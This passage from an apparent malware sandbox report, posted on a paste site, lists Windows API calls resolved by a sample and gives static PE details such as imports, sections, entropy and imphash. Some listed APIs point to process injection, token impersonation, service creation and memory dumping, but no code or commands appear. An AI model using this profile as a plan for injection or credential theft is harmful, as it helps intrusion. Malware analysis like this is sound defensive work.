- "msvcrt.dll._unlock",
- "msvcrt.dll._winmajor",
- "msvcrt.dll.abort",
- "msvcrt.dll.calloc",
- "msvcrt.dll.exit",
- "msvcrt.dll.fprintf",
- "msvcrt.dll.free",
- "msvcrt.dll.fwrite",
- "msvcrt.dll.malloc",
- "msvcrt.dll.memcpy",
- "msvcrt.dll.signal",
- "msvcrt.dll.strlen",
- "msvcrt.dll.strncmp",
- "msvcrt.dll.vfprintf",
- "kernel32.dll.UpdateProcThreadAttribute",
- "kernel32.dll.CreateRemoteThread",
- "kernel32.dll.VirtualProtectEx",
- "kernel32.dll.DuplicateHandle",
- "kernel32.dll.InitializeProcThreadAttributeList",
- "kernel32.dll.Thread32First",
- "kernel32.dll.Thread32Next",
- "kernel32.dll.SetLastError",
- "kernel32.dll.OpenThread",
- "kernel32.dll.SuspendThread",
- "kernel32.dll.PeekNamedPipe",
- "kernel32.dll.WaitNamedPipeA",
- "kernel32.dll.SetNamedPipeHandleState",
- "kernel32.dll.DeleteProcThreadAttributeList",
- "kernel32.dll.MoveFileA",
- "kernel32.dll.CopyFileA",
- "kernel32.dll.FileTimeToSystemTime",
- "kernel32.dll.GetLogicalDrives",
- "kernel32.dll.SystemTimeToTzSpecificLocalTime",
- "kernel32.dll.GetFullPathNameA",
- "kernel32.dll.CreateNamedPipeA",
- "kernel32.dll.GetCurrentThread",
- "kernel32.dll.ConnectNamedPipe",
- "kernel32.dll.GetFileTime",
- "kernel32.dll.CreatePipe",
- "kernel32.dll.GetCurrentDirectoryW",
- "kernel32.dll.FlushFileBuffers",
- "kernel32.dll.DisconnectNamedPipe",
- "kernel32.dll.MultiByteToWideChar",
- "kernel32.dll.SetFileTime",
- "kernel32.dll.WaitForSingleObject",
- "kernel32.dll.SetEnvironmentVariableW",
- "kernel32.dll.SetEnvironmentVariableA",
- "kernel32.dll.CompareStringW",
- "kernel32.dll.CompareStringA",
- "kernel32.dll.SetEndOfFile",
- "kernel32.dll.GetStringTypeW",
- "kernel32.dll.GetStringTypeA",
- "kernel32.dll.LCMapStringW",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.SetStdHandle",
- "kernel32.dll.WriteConsoleW",
- "kernel32.dll.GetConsoleOutputCP",
- "kernel32.dll.WriteConsoleA",
- "kernel32.dll.HeapSize",
- "kernel32.dll.IsValidCodePage",
- "kernel32.dll.GetCPInfo",
- "kernel32.dll.DebugBreak",
- "kernel32.dll.RaiseException",
- "kernel32.dll.GetEnvironmentStringsW",
- "kernel32.dll.FreeEnvironmentStringsW",
- "kernel32.dll.GetOEMCP",
- "kernel32.dll.GetLocalTime",
- "kernel32.dll.GetACP",
- "kernel32.dll.GetEnvironmentStrings",
- "kernel32.dll.FreeEnvironmentStringsA",
- "kernel32.dll.SetFilePointer",
- "kernel32.dll.GetFileType",
- "kernel32.dll.GetModuleHandleW",
- "kernel32.dll.RemoveDirectoryA",
- "kernel32.dll.GetCommandLineA",
- "kernel32.dll.HeapCreate",
- "kernel32.dll.HeapDestroy",
- "kernel32.dll.HeapReAlloc",
- "kernel32.dll.GetStdHandle",
- "kernel32.dll.TlsAlloc",
- "kernel32.dll.TlsSetValue",
- "kernel32.dll.TlsFree",
- "kernel32.dll.InterlockedIncrement",
- "kernel32.dll.InterlockedDecrement",
- "kernel32.dll.InitializeCriticalSectionAndSpinCount",
- "kernel32.dll.RtlUnwind",
- "kernel32.dll.GetConsoleCP",
- "kernel32.dll.GetConsoleMode",
- "kernel32.dll.SetHandleCount",
- "advapi32.dll.RegEnumValueA",
- "advapi32.dll.CloseServiceHandle",
- "advapi32.dll.CreateProcessWithLogonW",
- "advapi32.dll.DeleteService",
- "advapi32.dll.CryptGenRandom",
- "advapi32.dll.DuplicateTokenEx",
- "advapi32.dll.SetSecurityDescriptorDacl",
- "advapi32.dll.InitializeSecurityDescriptor",
- "advapi32.dll.RegEnumKeyA",
- "advapi32.dll.ControlService",
- "advapi32.dll.QueryServiceStatusEx",
- "advapi32.dll.ImpersonateNamedPipeClient",
- "advapi32.dll.OpenThreadToken",
- "advapi32.dll.OpenServiceA",
- "advapi32.dll.OpenSCManagerA",
- "advapi32.dll.QueryServiceStatus",
- "advapi32.dll.CreateProcessWithTokenW",
- "advapi32.dll.StartServiceA",
- "advapi32.dll.CreateServiceA",
- "wininet.dll.InternetQueryDataAvailable",
- "dnsapi.dll.DnsFree",
- "dnsapi.dll.DnsQuery_A",
- "iphlpapi.dll.GetIfEntry",
- "iphlpapi.dll.GetIpAddrTable",
- "secur32.dll.LsaCallAuthenticationPackage",
- "secur32.dll.LsaConnectUntrusted",
- "secur32.dll.LsaLookupAuthenticationPackage",
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.FlsFree",
- "cryptsp.dll.CryptGenRandom",
- "sechost.dll.LookupAccountNameLocalW",
- "advapi32.dll.LookupAccountSidW",
- "sechost.dll.LookupAccountSidLocalW",
- "wersvc.dll.ServiceMain",
- "wersvc.dll.SvchostPushServiceGlobals",
- "advapi32.dll.RegGetValueW",
- "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
- "faultrep.dll.WerpInitiateCrashReporting",
- "wer.dll.WerpCreateMachineStore",
- "shell32.dll.SHGetFolderPathEx",
- "ole32.dll.StringFromGUID2",
- "profapi.dll.#104",
- "sechost.dll.ConvertSidToStringSidW",
- "sspicli.dll.GetUserNameExW",
- "wer.dll.WerpSvcReportFromMachineQueue",
- "advapi32.dll.DuplicateToken",
- "wtsapi32.dll.WTSQueryUserToken",
- "winsta.dll.WinStationQueryInformationW",
- "advapi32.dll.CreateWellKnownSid",
- "rpcrt4.dll.RpcBindingSetAuthInfoExW",
- "rpcrt4.dll.NdrClientCall3",
- "advapi32.dll.CreateProcessAsUserW",
- "ole32.dll.CoInitializeEx",
- "ole32.dll.CoInitializeSecurity",
- "w32time.dll.SvchostEntry_W32Time",
- "w32time.dll.SvchostPushServiceGlobals",
- "ws2_32.dll.#115",
- "ws2_32.dll.WSASocketW",
- "ws2_32.dll.WSAIoctl",
- "ws2_32.dll.#111",
- "userenv.dll.RegisterGPNotification",
- "gpapi.dll.RegisterGPNotificationInternal",
- "sechost.dll.OpenSCManagerW",
- "sechost.dll.OpenServiceW",
- "sechost.dll.CloseServiceHandle",
- "sechost.dll.QueryServiceConfigW",
- "dsrole.dll.DsRoleGetPrimaryDomainInformation",
- "dsrole.dll.DsRoleFreeMemory",
- "sspicli.dll.LsaRegisterPolicyChangeNotification",
- "w32time.dll.TimeProvClose",
- "w32time.dll.TimeProvCommand",
- "w32time.dll.TimeProvOpen",
- "ws2_32.dll.getaddrinfo",
- "ws2_32.dll.freeaddrinfo",
- "ws2_32.dll.#23",
- "ws2_32.dll.#21",
- "ws2_32.dll.#2",
- "ws2_32.dll.WSAEventSelect",
- "vmictimeprovider.dll.TimeProvClose",
- "vmictimeprovider.dll.TimeProvCommand",
- "vmictimeprovider.dll.TimeProvOpen",
- "advapi32.dll.EventRegister",
- "advapi32.dll.EventEnabled",
- "ws2_32.dll.GetAddrInfoW",
- "advapi32.dll.EventWrite",
- "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
- "ws2_32.dll.FreeAddrInfoW",
- "ws2_32.dll.WSAAddressToStringW",
- "ws2_32.dll.#3",
- "ws2_32.dll.#116",
- "advapi32.dll.EventUnregister",
- "sspicli.dll.LsaUnregisterPolicyChangeNotification",
- "userenv.dll.UnregisterGPNotification",
- "gpapi.dll.UnregisterGPNotificationInternal",
- "imm32.dll.ImmDisableIME",
- "psapi.dll.GetModuleFileNameExW",
- "version.dll.GetFileVersionInfoSizeW",
- "version.dll.GetFileVersionInfoW",
- "version.dll.VerQueryValueW",
- "wer.dll.WerpCreateIntegratorReportId",
- "wer.dll.WerReportCreate",
- "wer.dll.WerpSetIntegratorReportId",
- "wer.dll.WerReportSetParameter",
- "dbgeng.dll.DebugCreate",
- "ntdll.dll.CsrGetProcessId",
- "ntdll.dll.DbgBreakPoint",
- "ntdll.dll.DbgPrint",
- "ntdll.dll.DbgPrompt",
- "ntdll.dll.DbgUiConvertStateChangeStructure",
- "ntdll.dll.DbgUiGetThreadDebugObject",
- "ntdll.dll.DbgUiIssueRemoteBreakin",
- "ntdll.dll.DbgUiSetThreadDebugObject",
- "ntdll.dll.NtAllocateVirtualMemory",
- "ntdll.dll.NtClose",
- "ntdll.dll.NtCreateDebugObject",
- "ntdll.dll.NtCreateFile",
- "ntdll.dll.NtDebugActiveProcess",
- "ntdll.dll.NtDebugContinue",
- "ntdll.dll.NtFreeVirtualMemory",
- "ntdll.dll.NtOpenProcess",
- "ntdll.dll.NtOpenThread",
- "ntdll.dll.NtQueryInformationProcess",
- "ntdll.dll.NtQueryInformationThread",
- "ntdll.dll.NtQueryMutant",
- "ntdll.dll.NtQueryObject",
- "ntdll.dll.NtQuerySystemInformation",
- "ntdll.dll.NtRemoveProcessDebug",
- "ntdll.dll.NtResumeThread",
- "ntdll.dll.NtSetInformationDebugObject",
- "ntdll.dll.NtSetInformationProcess",
- "ntdll.dll.NtSystemDebugControl",
- "ntdll.dll.NtWaitForDebugEvent",
- "ntdll.dll.RtlAnsiStringToUnicodeString",
- "ntdll.dll.RtlCreateProcessParameters",
- "ntdll.dll.RtlCreateUserProcess",
- "ntdll.dll.RtlDestroyProcessParameters",
- "ntdll.dll.RtlDosPathNameToNtPathName_U",
- "ntdll.dll.RtlFindMessage",
- "ntdll.dll.RtlFreeHeap",
- "ntdll.dll.RtlFreeUnicodeString",
- "ntdll.dll.RtlGetFunctionTableListHead",
- "ntdll.dll.RtlGetUnloadEventTrace",
- "ntdll.dll.RtlGetUnloadEventTraceEx",
- "ntdll.dll.RtlInitAnsiString",
- "ntdll.dll.RtlInitUnicodeString",
- "ntdll.dll.RtlTryEnterCriticalSection",
- "ntdll.dll.RtlUnicodeStringToAnsiString",
- "ntdll.dll.NtOpenProcessToken",
- "ntdll.dll.NtOpenThreadToken",
- "ntdll.dll.NtQueryInformationToken",
- "kernel32.dll.CloseProfileUserMapping",
- "kernel32.dll.DebugActiveProcessStop",
- "kernel32.dll.DebugBreakProcess",
- "kernel32.dll.DebugSetProcessKillOnExit",
- "kernel32.dll.Module32First",
- "kernel32.dll.Module32FirstW",
- "kernel32.dll.Module32Next",
- "kernel32.dll.Module32NextW",
- "kernel32.dll.Process32FirstW",
- "kernel32.dll.Process32NextW",
- "kernel32.dll.SetProcessShutdownParameters",
- "kernel32.dll.GetTimeZoneInformation",
- "kernel32.dll.Wow64GetThreadSelectorEntry",
- "advapi32.dll.CreateServiceW",
- "advapi32.dll.EnumServicesStatusExA",
- "advapi32.dll.EnumServicesStatusExW",
- "advapi32.dll.GetEventLogInformation",
- "advapi32.dll.OpenSCManagerW",
- "advapi32.dll.OpenServiceW",
- "advapi32.dll.StartServiceW",
- "advapi32.dll.GetSidSubAuthority",
- "advapi32.dll.GetSidSubAuthorityCount",
- "version.dll.GetFileVersionInfoSizeExW",
- "version.dll.GetFileVersionInfoExW",
- "dbghelp.dll.WinDbgExtensionDllInit",
- "dbghelp.dll.ExtensionApiVersion",
- "wer.dll.WerpSetDynamicParameter",
- "wer.dll.WerReportAddDump",
- "wer.dll.WerpSetCallBack",
- "wer.dll.WerReportSetUIOption",
- "wer.dll.WerpAddRegisteredDataToReport",
- "wer.dll.WerReportSubmit",
- "advapi32.dll.RegOpenKeyExW",
- "user32.dll.LoadStringW",
- "advapi32.dll.RegCreateKeyExW",
- "advapi32.dll.RegSetValueExW",
- "advapi32.dll.RegQueryValueExW",
- "sensapi.dll.IsNetworkAlive",
- "user32.dll.CharUpperW",
- "wer.dll.WerpAddAppCompatData",
- "apphelp.dll.SdbGetFileAttributes",
- "apphelp.dll.SdbFormatAttribute",
- "apphelp.dll.SdbFreeFileAttributes",
- "cryptsp.dll.CryptAcquireContextW",
- "cryptsp.dll.CryptGetHashParam",
- "dbghelp.dll.MiniDumpWriteDump",
- "kernel32.dll.GetLongPathNameA",
- "kernel32.dll.GetLongPathNameW",
- "kernel32.dll.GetProcessTimes",
- "powrprof.dll.CallNtPowerInformation",
- "psapi.dll.EnumProcessModules",
- "version.dll.GetFileVersionInfoSizeA",
- "version.dll.GetFileVersionInfoA",
- "version.dll.VerQueryValueA",
- "verifier.dll.VerifierEnumerateResource",
- "ntdll.dll.NtSuspendProcess",
- "ntdll.dll.NtResumeProcess",
- "advapi32.dll.QueryTraceW",
- "advapi32.dll.IsValidSid",
- "advapi32.dll.GetLengthSid",
- "advapi32.dll.CopySid",
- "advapi32.dll.InitializeAcl",
- "advapi32.dll.AddAccessAllowedAceEx",
- "advapi32.dll.RegisterEventSourceW",
- "advapi32.dll.ReportEventW",
- "advapi32.dll.DeregisterEventSource",
- "wer.dll.WerpGetStoreLocation",
- "wer.dll.WerpGetStoreType",
- "wer.dll.WerReportCloseHandle",
- "user32.dll.MsgWaitForMultipleObjects",
- "wer.dll.WerpFreeString",
- "user32.dll.GetProcessWindowStation",
- "user32.dll.GetThreadDesktop",
- "user32.dll.GetUserObjectInformationW",
- "werui.dll.WerUICreate",
- "werui.dll.WerUIStart",
- "werui.dll.WerUITerminate",
- "werui.dll.WerUIDelete"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "FreeLibrary",
- "address": "0x412000"
- },
- {
- "name": "GetLastError",
- "address": "0x412004"
- },
- {
- "name": "VirtualProtect",
- "address": "0x412008"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x41200c"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x412010"
- },
- {
- "name": "GetProcAddress",
- "address": "0x412014"
- },
- {
- "name": "InterlockedExchange",
- "address": "0x412018"
- },
- {
- "name": "ExitProcess",
- "address": "0x41201c"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x412020"
- },
- {
- "name": "Sleep",
- "address": "0x412024"
- },
- {
- "name": "GetSystemDefaultLangID",
- "address": "0x412028"
- },
- {
- "name": "InterlockedCompareExchange",
- "address": "0x41202c"
- },
- {
- "name": "TerminateProcess",
- "address": "0x412030"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x412034"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x412038"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x41203c"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x412040"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x412044"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x412048"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x41204c"
- },
- {
- "name": "GetTickCount",
- "address": "0x412050"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x412054"
- },
- {
- "name": "GlobalAddAtomW",
- "address": "0x412058"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x41205c"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x412060"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "CoInitialize",
- "address": "0x412068"
- },
- {
- "name": "CoUninitialize",
- "address": "0x41206c"
- }
- ],
- "dll": "ole32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x00018dec",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00018dec",
- "icon_hash": null,
- "entrypoint": "0x0040a7af",
- "timestamp": "2019-04-17 05:52:55",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00010e00",
- "entropy": "5.14",
- "raw_address": "0x00000400",
- "virtual_size": "0x00010c90",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00012000",
- "size_of_data": "0x00000a00",
- "entropy": "3.11",
- "raw_address": "0x00011200",
- "virtual_size": "0x0000092c",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00013000",
- "size_of_data": "0x00003c00",
- "entropy": "1.08",
- "raw_address": "0x00011c00",
- "virtual_size": "0x00006cc0",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0001a000",
- "size_of_data": "0x00002000",
- "entropy": "5.21",
- "raw_address": "0x00015800",
- "virtual_size": "0x00002000",
- "characteristics_raw": "0x40000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00002f10",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x0000049c"
- },
- {
- "virtual_address": "0x00012640",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000003c"
- },
- {
- "virtual_address": "0x0001a000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00001328"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00012000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000074"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "255baa199749cf1034252ceb61a58ccd",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 2,
- "versioninfo": []
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment